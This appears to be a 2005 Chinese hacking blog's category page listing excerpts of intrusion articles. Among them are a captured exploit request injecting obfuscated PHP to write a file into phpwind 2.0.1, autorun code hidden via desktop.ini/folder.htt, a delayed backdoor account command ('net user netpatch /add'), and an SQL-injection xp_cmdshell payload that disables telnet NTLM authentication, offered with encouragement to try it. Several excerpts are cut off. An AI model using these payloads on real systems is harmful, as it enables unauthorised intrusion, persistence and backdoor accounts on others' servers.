分类 ‘技术文章’ 下的日志

分析phpwind2.0.1漏洞

2005/04/18 9:52 | 鬼仔 | 技术文章 | 消灭0回复

作者:allyesno 来源:http://blog.csdn.net/freexploit/

猫猫传给我一个phpwind2.0.1漏洞利用程序,可以直接在目录中写入一个木马。怎么说呢,这个漏洞是pinkeyes发现的,本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的,我还在冒虚汗中,同时pinkeyes 的睿智深深的打动了我,原来我才明白什么才是真正的技术含量。且听我慢慢道来:
在程序运行时,我抓了一个包:

GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=<?fputs(fopen
(chr(46).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(112).chr(104).chr(112),w),
阅读全文 »

Tags:

用DESKTOP.INI和folder.htt来自动运行程序

2005/04/18 9:50 | 鬼仔 | 技术文章 | 消灭0回复

把c:winnt目录中的desktop.ini 和folder.htt(注意:每种不同目录下的desktop.ini和folder.htt文件都是不同的,所以一定要是winnt目录下的。)复制出来,用记事本打开folder.htt文件把下面的代码加在最前面:
阅读全文 »

Tags: ,

域名自助解析教程(以新网为例其他的都差不多或者更加简单)

2005/04/17 1:26 | 鬼仔 | 技术文章 | 消灭0回复

空间管理面板及玉米管理面板体验:http://www.ccnet.cn/help/webcp/webcp.htm

首先进http://www.paycenter.com.cn/manage/management.htm 输入你要管理的域名和密码登陆到控制面板
如图片我们可以看见:

就这几个连接简单解释下A:域名管理B:Mydns功能C:更改密码

对于C 很容易理解就是更改域名的管理密码是处于安全方面的设计使用方法也很简单就不多说了

对于B 仅仅适用与使用新网免费提供的dns解吸的服务,也就是说(这里设计到A下详)A里面的域名的dns这一项如果用的是默认的也就是新网提供的解吸的话对于B来说才是适用的, 阅读全文 »

Tags: ,

炸开L-BLOG程序大门

2005/04/16 1:20 | 鬼仔 | 技术文章 | 消灭0回复

作者:HaK_BaN[B.C.T] 来源:http://www.cnbct.org

首先说说的是什么是blog(博客)?因为很多人都不知道blog是什么?就算看完了这篇文章都不明白,所以浪费一些篇幅希望编辑不要删除!谢谢
释义:
网络出版(Web Publishing)、发表和张贴(Post——这个字当名词用时就是指张贴的文章)文章是个急速成长的网络活动,现在甚至出现了一个用来指称这种网络出版和发表文章的专有名词——Weblog,或Blog。一个Blog就是一个网页,它通常是由简短且经常更新的Post所构成;这些张贴的文章都按照年份和日期排列。Blog的内容和目的有很大的不同,从对其他网站的超级链接和评论,有关公司、个人、构想的新闻到日记、照片、诗歌、散文,甚至科幻小说的发表或张贴都有。许多Blogs是个人心中所想之事情的发表,其它Blogs则是一群人基于某个特定主题或共同 阅读全文 »

Tags:

批处版——SC

2005/04/16 1:16 | 鬼仔 | 技术文章 | 消灭0回复

作者:netpatch
来源:邪恶八进制 中国

说明:
批处版——SC

首先要感谢zzzEVAzzz,这个批处程序就是根据他发布的《Do All in Cmd Shell》文中的资料编写而成!
原理就是根据INF文件的功能(关于inf文件的详细信息,可以参考DDK帮助文档。)加以自动化编写而成!
难度很低,偶只用了十来分钟就编写出了这个批处程序。(高手看了不要笑哦……)

具体用法:

安装服务语法为:
np 服务名 /a 服务显示名称 服务描述 启动类型 要添加成服务的程序地址 /s
例子:
例如我要安装一个名为test的服务,其服务的显示名为:This is test 服务描述为:experimentation
要添加为服务的程序路径为c:\winnt\system32\test.exe 启动类型为:自动 并且安装后立即启动

首先把test.exe copy到c:\winnt\system32\
阅读全文 »

Tags:

一句命令实现定时运行某程序(或别的命令)

2005/04/15 9:46 | 鬼仔 | 技术文章 | 1 个回复

作者:netpatch 来源:http://www.icehack.com/

偶在邪恶八进制那闲逛时看到一个贴《如何定义一个命令20分钟后运行? 》
帖子作者(redbin)申明如下:
PS:不允许使用程序解决,不允许使用计划任务解决,请大家来指点下下!!!

回去研究后终于发现了一个办法可以实现定时(其实是延时)来运行某个程序或(命令)特贴出来共享一下
命令如下:
ping 127.0.0.1 -n 1200&net user netpatch /add
就是利用Ping命令的-n参数Ping自己1200下ping完后(也就是20分钟后)执行添加netpatch用户命令
这样就达到了定时运行某程序(命令)的目的了~~

有错误请指出!谢谢!
有什么更好的办法请贴出来~大家一起共享

《精通批处理教程》

2005/04/15 9:36 | 鬼仔 | 技术文章 | 消灭0回复

来源:邪恶八进制 中国
文章作者:雪莲蓬

小引:
最近好多猜测弱口令的病毒在网上流行,比如前段时间闹得很厉害的Worm.Dvldr 蠕虫就是一个典型。这些病毒有个共同点就是利用批处理来进行ipc$连接,从而来猜测管理员的口令达到控制服务器的目的。病毒由几个文件和几个复杂的批处理组成。批处理算不上真正意义上的编程,但是它的一些思想和编程比较近似。通过在网上和一些初学的朋友交流,发现他们对于批处理很感兴趣,多多少少了解一些命令的用法,但缺乏比较系统的了解,所以特意写下这篇教程,好让感兴趣的朋友对批处理有个整体的认识,并能通过该教程举一反三,写出自己的批处理。
该教程一共分为4大部分,第一部分是批处理的专用命令,第二部分是特殊的符号与批处理,第三部分是批处理与变量,第四部分是完整案例。因为教程比较长,所有在杂志上我们将分为两次连载,本期首先刊登一、二两部分,敬请读者注意。

阅读全文 »

Tags: ,

告诉大家一个小技巧 一直没人提到过的东东

2005/04/15 9:34 | 鬼仔 | 技术文章 | 1 个回复

很早以前的东西了
觉得有用
放到上面

文章作者:紫幻[EST顾问团成员]
信息来源:邪恶八进制 中国

相信大家都对telnet比较熟悉吧。hacking的时候经常用到的系统自带shell尤其是注射的时候,但是最讨厌的就是ntlm认证了,以前大家去掉ntlm的方法一般有2种。

1 上传ntml.exe 这种方法有很多缺点,比如:对方有杀毒软件,很多网段屏蔽了TFTP.

2 直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。

今天我给大家介绍我一直在使用的办法,压箱底的哦。

那就是直接运行命令:tlntadmn config sec = -ntlm

注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'–
运行以后就去掉了该死的ntlm认证:) 赶快去试试吧。